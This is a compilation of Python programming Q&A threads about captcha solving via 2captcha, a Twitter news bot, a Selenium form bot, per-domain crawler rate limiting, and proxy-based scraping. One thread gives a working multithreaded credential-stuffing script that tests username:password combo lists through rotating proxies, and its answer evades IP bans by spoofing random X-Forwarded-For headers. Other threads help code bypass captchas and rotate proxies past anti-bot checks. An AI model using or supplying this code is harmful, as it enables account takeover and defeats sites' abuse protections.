Setting an expiration on a function for a retry - python

I am harvesting captchas, and a captcha response is only good for 2 minutes. I am trying to figure out how to set up an "expired, fetch again" step so that a stale token is thrown away and a fresh one is requested:
def captchaToken():
    global captoken
    s = requests.Session()
    # here we post the site key to 2captcha to get a captcha ID (and we parse it here too)
    captcha_id = s.post("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(APItoken, sitekey, url)).text.split('|')[1]
    #time.sleep(5)
    print("Waiting for captcha...")
    # then we parse the g-response from the 2captcha response
    recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
    print("Solving captcha...")
    while 'CAPCHA_NOT_READY' in recaptcha_answer:
        print("Waiting for a response . . .")
        time.sleep(2.5)
        recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
    recaptcha_answer = recaptcha_answer.split('|')[1]
    captoken = recaptcha_answer
    print(Fore.MAGENTA + "Captcha Response: " + recaptcha_answer)

I'd suggest:
while 1:
    captcha = get_captcha()
    request = post_captcha(captcha)
    start = time.time()
    while 1:
        response = poll_for_result(request)
        if start + 120 < time.time():
            time_is_up()
            break
        if response:
            return deal_with_response(response)
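If you want to keep the shape of your original captchaToken, here is a minimal sketch of that same pattern folded into it (assuming APItoken, sitekey and url are the same values your question uses, and treating 120 seconds as the deadline, as in the pseudocode above):
import time
import requests

CAPTCHA_TTL = 120  # assumption: a solved token is only good for 2 minutes

def captcha_token(APItoken, sitekey, url):
    """Keep submitting/polling 2captcha until a token comes back within the TTL."""
    s = requests.Session()
    while True:
        # submit the sitekey and get back a captcha ID
        captcha_id = s.post(
            "http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(
                APItoken, sitekey, url)).text.split('|')[1]
        start = time.time()
        while time.time() - start < CAPTCHA_TTL:
            answer = s.get(
                "http://2captcha.com/res.php?key={}&action=get&id={}".format(
                    APItoken, captcha_id)).text
            if 'CAPCHA_NOT_READY' not in answer:
                return answer.split('|')[1]
            time.sleep(2.5)
        print("Expired, fetching again")  # deadline passed: drop this ID and resubmit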

Related

How to check if file is already in the cache?

I am working on a tool that posts in-game news updates from games to your Twitter account. For the last few days I have been looking for a way to check whether an image is already in the cache, so that when a game's news feed updates, only the new items get posted and the old ones are skipped (at the moment it posts every active news item again). I have tested it about 100 times but I can't get it to work. I really hope one of you can help me with this issue; thanks in advance for any help.
Here is my code:
import tweepy
import time
import requests
import os
from colorama import *
init()
auth = tweepy.OAuthHandler('API', 'APISECRET')
auth.set_access_token('ACESS', 'ACESSSECRET')
response = requests.get('https://fortnite-api.com/v2/news/br')
newsData = response.json()["data"]
#-----
footer = '#Fortnite'
delay = 5
saveImages = True
#-----
while 1:
    response = requests.get('https://fortnite-api.com/v2/news/br')
    if response:
        newsDataLoop = response.json()["data"]
        print("2 - Checking for change in news feed...")
        if newsData != newsDataLoop:
            #if loop == True:
            print("News Feed has changed...")
            for i in newsDataLoop["motds"]:
                try:
                    print("Saving: "+i["id"])
                    url = i["image"]
                    r = requests.get(url, allow_redirects=True)
                    open("NewsImages/"+i["id"]+'.png', 'wb').write(r.content)
                    print("Saved: "+i["id"])
                    try:
                        api = tweepy.API(auth)
                        api.update_with_media("NewsImages/"+i["id"]+'.png', "Fortnite News Update:\n\n"+i["title"]+":\n"+i["body"]+"\n\n"+footer)
                        print("Tweeted: "+i["id"])
                    except:
                        print("Failed to tweet: "+i["id"])
                    if saveImages == 'False':
                        os.remove("NewsImages/"+i["id"]+'.png')
                    response = requests.get('https://fortnite-api.com/v2/news/br')
                    newsData = response.json()["data"]
                except:
                    print("Error in tweeting news feed: skipping")
            print("Finished news feed publishing")
    else:
        print("FAILED TO GRAB NEWS DATA: URL DOWN")
    time.sleep(delay)
You need to check each motd to see if it existed in the old dataset.
import tweepy
import time
import requests
import os
from colorama import *
init()
auth = tweepy.OAuthHandler('API', 'APISECRET')
auth.set_access_token('ACESS', 'ACESSSECRET')
response = requests.get('https://fortnite-api.com/v2/news/br')
newsData = response.json()["data"]
#-----
footer = '#Fortnite'
delay = 5
saveImages = True
#-----
while 1:
    response = requests.get('https://fortnite-api.com/v2/news/br')
    if response:
        newsDataLoop = response.json()["data"]
        print("2 - Checking for change in news feed...")
        if newsData != newsDataLoop:
            #if loop == True:
            print("News Feed has changed...")
            for i in newsDataLoop["motds"]:
                if i in newsData["motds"]:
                    # has already been posted
                    print("Already posted")
                    continue
                try:
                    print("Saving: "+i["id"])
                    url = i["image"]
                    r = requests.get(url, allow_redirects=True)
                    open("NewsImages/"+i["id"]+'.png', 'wb').write(r.content)
                    print("Saved: "+i["id"])
                    try:
                        api = tweepy.API(auth)
                        api.update_with_media("NewsImages/"+i["id"]+'.png', "Fortnite News Update:\n\n"+i["title"]+":\n"+i["body"]+"\n\n"+footer)
                        print("Tweeted: "+i["id"])
                    except:
                        print("Failed to tweet: "+i["id"])
                    if saveImages == 'False':
                        os.remove("NewsImages/"+i["id"]+'.png')
                    response = requests.get('https://fortnite-api.com/v2/news/br')
                    newsData = response.json()["data"]
                except:
                    print("Error in tweeting news feed: skipping")
            print("Finished news feed publishing")
    else:
        print("FAILED TO GRAB NEWS DATA: URL DOWN")
    time.sleep(delay)
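If the motd dicts can change in fields you don't care about (which would make the in check re-post items), another option is to remember the IDs that were already tweeted, for example in a small text file so the record survives restarts. A minimal sketch, assuming each motd has a stable "id" as in the code above; the file name posted_ids.txt is just an example:
import os

POSTED_FILE = "posted_ids.txt"  # example file that remembers which motd IDs were tweeted

def load_posted_ids():
    """Return the set of motd IDs that have been tweeted before."""
    if not os.path.exists(POSTED_FILE):
        return set()
    with open(POSTED_FILE) as f:
        return {line.strip() for line in f if line.strip()}

def mark_posted(motd_id):
    """Record a freshly tweeted motd ID so it is skipped next time."""
    with open(POSTED_FILE, "a") as f:
        f.write(motd_id + "\n")

# inside the loop, instead of comparing whole dicts:
# posted = load_posted_ids()
# for i in newsDataLoop["motds"]:
#     if i["id"] in posted:
#         continue            # already tweeted
#     ...save the image and tweet it...
#     mark_posted(i["id"])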

How to solve python selenium 2captcha problem?

Here is my code.
while True:
    username_box = self.driver.find_element_by_xpath(
        '//*[@id="snapname"]')
    username_box.send_keys('xxxx')
    sleep(2)
    age_select = Select(self.driver.find_element_by_id('age'))
    age_select.select_by_value(random.choice(age_values))
    sleep(2)
    gender_select = Select(self.driver.find_element_by_id('gender'))
    gender_select.select_by_value('female')
    sleep(2)
    add_me_btn = self.driver.find_element_by_id('submitBtn')
    add_me_btn.click()
    try:
        logout = self.driver.find_element_by_xpath(
            '//*[@id="wrap"]/div[1]/div/div[2]/ul/li/a')
        logout.click()
        sleep(2)
        logout1 = self.driver.find_element_by_xpath(
            "//*[@id='wrap']/div[1]/div/div[2]/ul/li/ul/li/a")
        logout1.click()
        sleep(5)
    except:
        service_key = 'Service key here'
        google_site_key = 'Site key here'
        pageurl = 'Page Url Here'
        url = "http://2captcha.com/in.php?key=apikeyhere&method=userrecaptcha&googlekey=sitekeyhere&pageurl=pageurlhere"
        resp = requests.get(url)
        if resp.text[0:2] != 'OK':
            quit('Service error. Error Code' + resp.text)
        captcha_id = resp.text[3:]
        fetch_url = "http://2captcha.com/res.php?key=apikeyhere&action=get&id=" + captcha_id
        for i in range(1, 20):
            sleep(5)
            resp = requests.get(fetch_url)
            if resp.text[0:2] == 'OK':
                break
        print('Time to solve:', time() - start_time)
        submit_url = "urlhere"
        headers = {
            'user-agent': 'Mozilla/5.0 Chrome/52.0.2743.116 Safari/537.36'}
        payload = {
            'submit': 'submit',
            'g-recaptcha-response': resp.text[3:]
        }
        resp = requests.post(submit_url, headers=headers, data=payload)
I'm trying to solve a captcha for a site, using 2captcha for the job. However, this code can't solve the captcha. The bot works up to this line:
print('Time to solve:', time() - start_time)
but after that it just returns to the beginning of the while loop. What could be wrong with this code?
Have you checked if your captchas were sent to 2captcha? I mean here: https://2captcha.com/statistics/uploads
And if they are there, what status do they have?
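If you want to check the same thing from inside the script, you could log exactly what in.php and res.php return at each step before you use the token; any ERROR_... response tells you why nothing shows up in the statistics. A minimal sketch under the same assumptions as the code above (apikeyhere, sitekeyhere and pageurlhere are still placeholders):
import requests
from time import sleep

def solve_recaptcha(api_key, site_key, page_url, polls=20, poll_delay=5):
    """Submit a reCAPTCHA job to 2captcha and return the token, logging each status."""
    resp = requests.get(
        "http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(
            api_key, site_key, page_url))
    print("in.php replied:", resp.text)        # should be OK|<captcha id>
    if not resp.text.startswith('OK'):
        raise RuntimeError("2captcha rejected the job: " + resp.text)
    captcha_id = resp.text.split('|')[1]
    fetch_url = "http://2captcha.com/res.php?key={}&action=get&id={}".format(api_key, captcha_id)
    for _ in range(polls):
        sleep(poll_delay)
        resp = requests.get(fetch_url)
        print("res.php replied:", resp.text)   # CAPCHA_NOT_READY, an ERROR_..., or OK|<token>
        if resp.text.startswith('OK'):
            return resp.text.split('|')[1]
        if resp.text != 'CAPCHA_NOT_READY':
            raise RuntimeError("2captcha error: " + resp.text)
    raise RuntimeError("Timed out waiting for the solution")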

aiohttp: rate limiting requests-per-second by domain

I am writing a web crawler that is running parallel fetches for many different domains. I want to limit the number of requests-per-second that are made to each individual domain, but I do not care about the total number of connections that are open, or the total requests per second that are made across all domains. I want to maximize the number of open connections and requests-per-second overall, while limiting the number of requests-per-second made to individual domains.
All of the currently existing examples I can find either (1) limit the number of open connections or (2) limit the total number of requests-per-second made in the fetch loop. Examples include:
aiohttp: rate limiting parallel requests
aiohttp: set maximum number of requests per second
Neither of them does what I am asking for, which is to limit requests-per-second on a per-domain basis. The first question only covers limiting requests-per-second overall. The second one doesn't even have answers to the actual question (the OP asks about requests per second and the answers all talk about limiting the number of connections).
Here is the code that I tried, using a simple rate limiter I made for a synchronous version, which doesn't work when the DomainTimer code is run in an async event loop:
from collections import defaultdict
from datetime import datetime, timedelta
import asyncio
import async_timeout
import aiohttp
from urllib.parse import urlparse
from queue import Queue, Empty
from HTMLProcessing import processHTML
import URLFilters

SEED_URLS = ['http://www.bbc.co.uk', 'http://www.news.google.com']
url_queue = Queue()
for u in SEED_URLS:
    url_queue.put(u)

# number of pages to download per run of crawlConcurrent()
BATCH_SIZE = 100
DELAY = timedelta(seconds=1.0)  # delay between requests from a single domain, in seconds
HTTP_HEADERS = {'Referer': 'http://www.google.com',
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0'}

class DomainTimer():
    def __init__(self):
        self.timer = None

    def resetTimer(self):
        self.timer = datetime.now()

    def delayExceeded(self, delay):
        if not self.timer:  # we haven't fetched this domain before
            return True
        if (datetime.now() - self.timer) >= delay:
            return True
        else:
            return False

crawl_history = defaultdict(dict)  # given a URL, when was it last crawled?
domain_timers = defaultdict(DomainTimer)

async def fetch(session, url):
    domain = urlparse(url).netloc
    print('here fetching ' + url + "\n")
    dt = domain_timers[domain]
    if dt.delayExceeded(DELAY) or not dt:
        with async_timeout.timeout(10):
            try:
                dt.resetTimer()  # reset domain timer
                async with session.get(url, headers=HTTP_HEADERS) as response:
                    if response.status == 200:
                        crawl_history[url] = datetime.now()
                        html = await response.text()
                        return {'url': url, 'html': html}
                    else:
                        # log HTTP response, put into crawl_history so
                        # we don't attempt to fetch again
                        print(url + " failed with response: " + str(response.status) + "\n")
                        return {'url': url, 'http_status': response.status}
            except aiohttp.ClientConnectionError as e:
                print("Connection failed " + str(e))
            except aiohttp.ClientPayloadError as e:
                print("Received bad data from server @ " + url + "\n")
    else:  # delay hasn't passed yet: skip for now & put at end of queue
        url_queue.put(url)
        return None

async def fetch_all(urls):
    """Launch requests for all web pages."""
    tasks = []
    async with aiohttp.ClientSession() as session:
        for url in urls:
            task = asyncio.ensure_future(fetch(session, url))
            tasks.append(task)  # create list of tasks
        return await asyncio.gather(*tasks)  # gather task responses

def batch_crawl():
    """Launch requests for all web pages."""
    start_time = datetime.now()

    # Here we build the list of URLs to crawl for this batch
    urls = []
    for i in range(BATCH_SIZE):
        try:
            next_url = url_queue.get_nowait()  # get next URL from queue
            urls.append(next_url)
        except Empty:
            print("Processed all items in URL queue.\n")
            break

    loop = asyncio.get_event_loop()
    asyncio.set_event_loop(loop)
    pages = loop.run_until_complete(fetch_all(urls))
    crawl_time = (datetime.now() - start_time).seconds
    print("Crawl completed. Fetched " + str(len(pages)) + " pages in " + str(crawl_time) + " seconds.\n")
    return pages

def parse_html(pages):
    """Parse the HTML for each page downloaded in this batch."""
    start_time = datetime.now()
    results = {}
    for p in pages:
        if not p or not p['html']:
            print("Received empty page")
            continue
        else:
            url, html = p['url'], p['html']
            results[url] = processHTML(html)
    processing_time = (datetime.now() - start_time).seconds
    print("HTML processing finished. Processed " + str(len(results)) + " pages in " + str(processing_time) + " seconds.\n")
    return results

def extract_new_links(results):
    """Extract links from the parsed results."""
    # later we could track where links were from here, anchor text, etc.,
    # and weight queue priority based on that
    links = []
    for k in results.keys():
        new_urls = [l['href'] for l in results[k]['links']]
        for u in new_urls:
            if u not in crawl_history.keys():
                links.append(u)
    return links

def filterURLs(urls):
    urls = URLFilters.filterDuplicates(urls)
    urls = URLFilters.filterBlacklistedDomains(urls)
    return urls

def run_batch():
    pages = batch_crawl()
    results = parse_html(pages)
    links = extract_new_links(results)
    for l in filterURLs(links):
        url_queue.put(l)
    return results
There are no errors or exceptions thrown, and the rate-limiting code works fine for synchronous fetches, but the DomainTimer has no apparent effect when run in the async event loop. The delay of one request per second per domain is not upheld...
How would I modify this synchronous rate-limiting code to work within the async event loop? Thanks!
It's hard to debug your code since it contains a lot of unrelated stuff; it's easier to show the idea on a new, simple example.
Main idea:
write your own Semaphore-like class using __aenter__ and __aexit__ that accepts a url (domain)
use a domain-specific Lock to prevent multiple concurrent requests to the same domain
sleep before allowing the next request, based on the domain's last request time and the allowed RPS
track the time of the last request for each domain
Code:
import asyncio
import aiohttp
from urllib.parse import urlparse
from collections import defaultdict

class Limiter:
    # domain -> req/sec:
    _limits = {
        'httpbin.org': 4,
        'eu.httpbin.org': 1,
    }

    # domain -> its lock:
    _locks = defaultdict(lambda: asyncio.Lock())

    # domain -> time of its last request:
    _times = defaultdict(lambda: 0)

    def __init__(self, url):
        self._host = urlparse(url).hostname

    async def __aenter__(self):
        await self._lock.acquire()  # one request at a time per host
        to_wait = self._to_wait_before_request()
        print(f'Wait {to_wait} sec before next request to {self._host}')
        await asyncio.sleep(to_wait)

    async def __aexit__(self, *args):
        print(f'Request to {self._host} just finished')
        self._update_request_time()
        self._lock.release()

    @property
    def _lock(self):
        """Lock that prevents multiple requests to same host."""
        return self._locks[self._host]

    def _to_wait_before_request(self):
        """How long we need to wait before the next request to this host."""
        request_time = self._times[self._host]
        request_delay = 1 / self._limits[self._host]
        now = asyncio.get_event_loop().time()
        to_wait = request_time + request_delay - now
        to_wait = max(0, to_wait)
        return to_wait

    def _update_request_time(self):
        now = asyncio.get_event_loop().time()
        self._times[self._host] = now

# request that uses Limiter instead of Semaphore:
async def get(url):
    async with Limiter(url):
        async with aiohttp.ClientSession() as session:  # TODO: reuse session for different requests
            async with session.get(url) as resp:
                return await resp.text()

# main:
async def main():
    coros = [
        get('http://httpbin.org/get'),
        get('http://httpbin.org/get'),
        get('http://httpbin.org/get'),
        get('http://httpbin.org/get'),
        get('http://httpbin.org/get'),
        get('http://eu.httpbin.org/get'),
        get('http://eu.httpbin.org/get'),
        get('http://eu.httpbin.org/get'),
        get('http://eu.httpbin.org/get'),
        get('http://eu.httpbin.org/get'),
    ]
    await asyncio.gather(*coros)

if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(main())
    finally:
        loop.run_until_complete(loop.shutdown_asyncgens())
        loop.close()
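To tie this back to the crawler in the question, a rough sketch (assuming the Limiter class above and the HTTP_HEADERS dict from the question are in scope) would be to wrap the session.get in fetch() with the Limiter, and give unknown domains a default rate instead of the hard-coded _limits table:
from collections import defaultdict

DEFAULT_RPS = 1  # assumption: one request per second for domains not listed in _limits
Limiter._limits = defaultdict(lambda: DEFAULT_RPS, Limiter._limits)

async def fetch(session, url):
    async with Limiter(url):  # enforces the per-domain delay
        async with session.get(url, headers=HTTP_HEADERS) as response:
            if response.status == 200:
                return {'url': url, 'html': await response.text()}
            return {'url': url, 'http_status': response.status}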
I developed a library named octopus-api (https://pypi.org/project/octopus-api/) that lets you rate-limit and cap the number of connections to an endpoint, using aiohttp under the hood. Its goal is to simplify all of the aiohttp setup needed.
Here is an example of how to use it, where get_ethereum is the user-defined request function. It could just as well have been a web-crawler request function or whatever fits:
from octopus_api import TentacleSession, OctopusApi
from typing import Dict, List

if __name__ == '__main__':
    async def get_ethereum(session: TentacleSession, request: Dict):
        async with session.get(url=request["url"], params=request["params"]) as response:
            body = await response.json()
            return body

    client = OctopusApi(rate=50, resolution="sec", connections=6)
    result: List = client.execute(requests_list=[{
        "url": "https://api.pro.coinbase.com/products/ETH-EUR/candles?granularity=900&start=2021-12-04T00:00:00Z&end=2021-12-04T00:00:00Z",
        "params": {}}] * 1000, func=get_ethereum)
    print(result)
TentacleSession works the same way you would write POST, GET, PUT and PATCH calls with aiohttp.ClientSession.
Let me know if it helps your issue with rate limits and connections for crawling.

Sending Asynchronous requests with Python requests library

As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from math import ceil  # ceil() is used below
from lxml import html
import json
from time import sleep

global proxy_queue
global user_queue
global hits
global stats
global start_time

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }

def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()

def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),

if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
So it is expected to make many requests to the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
In the attempt to make multiple requests through multiple sessions, it is somehow failing to keep them separate because it doesn't support asynchronicity.
The victim site bans IPs by group, e.g. banning all IPs starting with 132.x.x.x when it receives multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in from my browser without any proxy and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a life saver.
I was using elite-level proxies, and there was no way the victim site could have found my IP address; however, it was using X-Forwarded-For to detect my real IP address.
Since elite-level proxies do not expose the IP address and don't attach a Client-IP header, the only way the site could detect my IP was through the last address in X-Forwarded-For. The solution is to set the X-Forwarded-For header to a random IP address every time a request is made.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])

Python: parallel loop

I have a dataframe with a column
event_time
avito.ru/morozovsk/avtomobili/honda_accord_1998_799656153
avito.ru/donetck/avtomobili/honda_accord_2000_829068734
avito.ru/taganrog/avtomobili/volkswagen_passat_1997_839237476
avito.ru/volgodonsk/avtomobili/volkswagen_golf_1993_657720225
avito.ru/taganrog/avtomobili/peugeot_206_2008_818743294
avito.ru/bataysk/avtomobili/peugeot_206_2002_825498743
and I need to open each HTML page. I use a proxy, with this code:
for url in urls:
    m = re.search(r'avito.ru\/[a-z]+\/avtomobili\/[a-z0-9_]+$', url)
    if m is not None:
        url = 'https://www.' + url
        proxy = pd.read_excel('proxies.xlsx')
        proxies = proxy.proxy.values.tolist()
        for i, proxy in enumerate(proxies):
            # print "Trying HTTP proxy %s" % proxy
            try:
                result = urllib.urlopen(url, proxies={'http': proxy}).read()
                if 'Мы обнаружили, что запросы, поступающие с вашего IP-адреса, похожи на автоматические' in result:
                    raise Exception
                else:
                    soup = BeautifulSoup(result, 'html.parser')
                    price = soup.find('span', itemprop="price")
                    print price
            except:
                print "Trying next proxy %s in 30 seconds" % proxy
                time.sleep(30)
But it takes a lot of time! I want to do it faster.
I tried to move this code into a function
def get_page(url):
and then run
if __name__ == '__main__':
    pool = Pool(processes=8)
    pool.map(get_page, urls)
I want to open each URL through some proxy, but it doesn't work right for me.
Is there any way to solve my task?
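A minimal sketch of the Pool approach the question is reaching for, with the per-URL work moved into get_page. This is a sketch under assumptions rather than the original code: it uses requests and BeautifulSoup instead of urllib, a thread pool (the fetches are I/O-bound), and a simple random proxy choice per call:
import random
import requests
from bs4 import BeautifulSoup
from multiprocessing.dummy import Pool  # thread pool with the same API as multiprocessing.Pool

PROXIES = []  # e.g. loaded once from proxies.xlsx, as in the question

def get_page(url):
    """Fetch one ad page through a random proxy and return (url, price text) or None."""
    proxy = random.choice(PROXIES) if PROXIES else None
    try:
        r = requests.get(url,
                         proxies={'http': proxy, 'https': proxy} if proxy else None,
                         timeout=30)
        soup = BeautifulSoup(r.text, 'html.parser')
        price = soup.find('span', itemprop='price')
        return url, price.get_text(strip=True) if price else None
    except requests.RequestException:
        return None

if __name__ == '__main__':
    urls = ['https://www.avito.ru/...']  # the prepared URLs from the dataframe
    with Pool(processes=8) as pool:      # 8 workers fetching in parallel
        results = pool.map(get_page, urls)
    print(results)
multiprocessing.dummy gives a thread pool behind the familiar Pool interface, which avoids pickling issues and is usually enough for network-bound work like this.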
